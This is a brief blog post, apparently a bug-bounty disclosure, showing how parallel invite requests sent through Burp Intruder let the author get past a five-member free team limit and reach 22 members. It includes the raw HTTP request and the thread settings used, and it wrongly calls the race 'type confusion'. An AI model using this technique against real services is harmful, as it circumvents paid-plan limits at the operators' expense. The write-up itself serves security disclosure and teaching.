Race Condition bypassing team limit

Arbaz Hussain
Jul 20, 2017 · 1 min read

Severity: Medium

Complexity: Easy

Weakness: Race condition


  • While testing one of the application, they have functionality to create team and invite user’s to team .
  • they have free limit of inviting 5 user’s to team.If you want to invite more user’s , they will ask you to upgrade you’r plan to pro.
  • Request while adding member to our team.
  • Request:

POST /account/work/team/ HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site.com/home/work/team/manage
Content-Length: 108
Cookie: <REDACTED>
Connection: close

emails=xxxxxxx@gmail.com&team=name&authenticity_token=<>

  • Sending the Request to Burp Intruder By Adding Email List to emails= Parameter.
  • Setting Minimum Thread Speed(10–15) and Start Attack.
Image for post
Image for post
  • Result:
Bypassed the limit to 22
  • Increasing Threading to ~10 will send 10 request’s at the same time. this will generate a type confusion which bypassed their team limit.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store